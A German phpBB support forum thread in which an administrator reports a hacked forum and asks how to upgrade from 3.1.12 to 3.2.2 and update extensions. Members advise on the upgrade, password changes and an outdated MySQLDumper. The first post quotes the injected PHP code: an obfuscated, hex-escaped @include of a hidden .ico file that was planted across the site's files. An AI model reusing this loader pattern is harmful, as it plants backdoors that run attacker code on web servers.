[3.1] Upgrade von 3.1.12 auf 3.2.2 nach Hack

[Sir Charles]

Hallo liebe Leute,

nach längerem bin ich wieder mal da. Mit den meisten Foren bin ich bereits auf 3.2.1 aber mein etwas stärker modifiziertes Hauptforum hängt noch auf 3.1.11 bzw. jetzt 3.1.12.

Nachdem mein Forum gehackt wurde (in fast alle php-Dateien wurde beispielsweise folgender Code platziert)

Code: Alles auswählen

<?php
 /*c008c*/

 @include "\x45:\x2fW\x57W\x52o\x6ft\x2fg\x65s\x63h\x69c\x68t\x65f\x6fr\x75m\x2ea\x74/\x5f/\x69n\x63l\x75d\x65s\x2fm\x63p\x2f.\x640\x372\x66e\x305\x2ei\x63o";

 /*c008c*/


 echo @file_get_contents('index.htm.bak.bak');

konnte ich mit meinem Hoster das Forum wieder herstellen und habe mal auf 3.1.12 aktualisiert, möchte jetzt aber schnellstmöglich auf 3.2.2 gehen...speziell, weil anscheinend wieder (oder noch immer) Dateien von diesen Eingriffen befallen sind.

ich möchte mich nur absichern, bevor ich ans Werk gehe:
Für das Upgrade gehe ich vor wie hier beschrieben: https://www.phpbb.de/kb/phpBB32_upgrade_from_31
und wähle das manuelle Upgrade unter Deaktivierung aller Styles außer Prosilver und aller Extensions.
Dann alles löschen, phpbb 3.2.2 samt Fixes hochladen (außer config.php) und die genannten Ordner in der Anleitung auslassen.
Dann install-Script starten und weiteres Vorgehen wie in der verlinkten Anleitung.

und jetzt meine Frage: wie aktualisiere ich nach diesem Schritt die extensions auf die neue Version? Beim Style kann ich wohl einfach die Dateien überschreiben mit der neuen Style-Version für phpBB 3.2 (es geht um prosilver SE)

Ich wäre sehr dankbar, wenn ihr mir da einen Hinweis geben könntet (oder auch nur bestätigen, dass das Vorgehen so richtig wäre)

Danke!

[vfrblue]

Du solltest bei den Erweiterungen prüfen, ob dafür Versionen für phpBB 3.2.x vorhanden sind. Da die alten schon deaktiviert, nicht deinstalliert, sind, die Dateien auch löschen und die neuen Versionen hochladen und aktivieren. Eine andere Vorgehensweise ist in der Erweiterung beschrieben.
Sonst passt alles soweit.

[Scanialady]

Es sind derzeit HTML5-Spiele aus Frankreich im Umlauf, die in den Unterordnern derart merkwürdigen Code in index.htm Dateien mitbringen, der sich zu vervielfältigen scheint. Falls du Spiele im Einsatz hast, wirf mal einen Blick auf jede einzelne index.htm, welche du finden kannst. So oder so wäre bei einer Infektion kein Sinn darin, irgendwelche Dateien noch weiter zu verwenden.

Extensionen werden so ähnlich aktualisiert. Du deaktivierst sie alle im ACP. NICHT die Arbeitsdaten löschen. Dann die neuen Dateien hochladen - prüfe, ob du eventuell die alten vorher löschen musst! - und im ACP wieder aktivieren. Voila.

Wenn es keine Updates dafür gibt, musst du dich in den meisten Fällen davon verabschieden.

[Sir Charles]

Danke für die Antworten

@Mylady: nein, keine Spiele.Das Forum ist eigentlich wenig genutzt (FB sei "Dank"), und außer dem Downloadmod, Kalender, Portal und Announcement ist eigentlich auch nichts drinnen, schon gar keine Spiele.

Gibts keine bekannte Lücke im 3.1.11 oder 3.1.12, die das erklären würde?

Dann mach ich mich mal auf die Suche, ob es die Extensions überhaupt noch gibt.

Danke!

[canonknipser]

Die Sicherheitslücke würde ich eher in deinen Zugangsdaten für deinen Server suchen.
Zuallererst: ALLE Passwörter (insbesondere FTP und Account-Password bei deinem Provider ändern). Dann prüfen, ob die Dateirechte für die Dateien in phpBB richtig stehen: KB:rechte

Wenn du auf einem Shared Server bist und das nichts hilft: Dann auch deinen Hoster um Hilfe bitten, ggf. hat ein anderer Account auf dem Server zu viele Rechte oder die Serversoftware selber ist verwundbar.

[Sir Charles]

@canonknipser: danke, das wäre sowieso der nächste Schritt gewesen.

Ich fürchte ja auch, dass eine eigentlich abgesicherte mysqldumper-Installation das Ganze korrumpiert hat. Das hatte auch mein Hoster in Verdacht...

[Mahony]

Hallo Sir Charles

Ich fürchte ja auch, dass eine eigentlich abgesicherte mysqldumper-Installation das Ganze korrumpiert hat. Das hatte auch mein Hoster in Verdacht...

Wie kommt dein Hoster denn auf diesen Verdacht? Wenn dein Mysqldumper per .htaccess geschützt war, dann ist es doch recht unwahrscheinlich das darüber ein Hack stattfand.

Wenn dein Hoster professionell arbeitet, dann schaut er sich die Server Logs an und ermittelt akribisch die Ursache des Hacks und stellt da keine haltlosen Vermutungen an. Ich würde mir in solch einem Fall tunlichst überlegen, ob ich bei solch einem Hoster bleiben möchte (der stellt dann nämlich eine Gefahr für den gesamten Server dar).

Grüße: Mahony

[Sir Charles]

Hallo Mahony,

ich bin mir selber bei der .htaccess nicht mehr sicher, weil das nie richtig funktioniert hat; ich hab um Zugriff zu erlangen, immer die .htaccess rausgelöscht und dann wieder hochgeladen.

Der Kritikpunkt am veralteten MySQLDumper von 2008 ist vielleicht auch zutreffend, aber da gibts halt nix neueres mehr.

Er hat jetzt in den Logs Nachschau gehalten und noch 2 korrumpierte php-Dateien gefunden... eine hätte beim Upgrade sowieso dran glauben müssen, aber die andere war im ext-Ordner versteckt, die hätte vielleicht auch das Upgrade überlebt. Jetzt sollte wieder alles sicher sein.

[Mahony]

Hallo

Der Kritikpunkt am veralteten MySQLDumper von 2008 ist vielleicht auch zutreffend, aber da gibts halt nix neueres mehr.

Klar gibt es da eine neuere Version (PHP 7 Kompatibel) >>> https://github.com/DSB/MySQLDumper

P.S.

Er hat jetzt in den Logs Nachschau gehalten und noch 2 korrumpierte php-Dateien gefunden... eine hätte beim Upgrade sowieso dran glauben müssen, aber die andere war im ext-Ordner versteckt, die hätte vielleicht auch das Upgrade überlebt.

Welche ext war es denn, wo die Datei lag. Evtl. sollte man dann mal deren Sicherheit überprüfen.

Grüße: Mahony

[Sir Charles]

Welche ext war es denn, wo die Datei lag. Evtl. sollte man dann mal deren Sicherheit überprüfen.

Danke für den Hinweis auf die neue mySQLDumper-Version!

zur Extension: der Schadcode hatte sich eingenistet in /ext/vse/abbc3/ext.php ; das ist die Advanced BBCode Box 3. Interessanterweise hat die Extension trotzdem funktioniert. Die ist von VSE, das ist einer der Admins bei phpbb.com... ich denke, da sollte die Sicherheit passen, oder?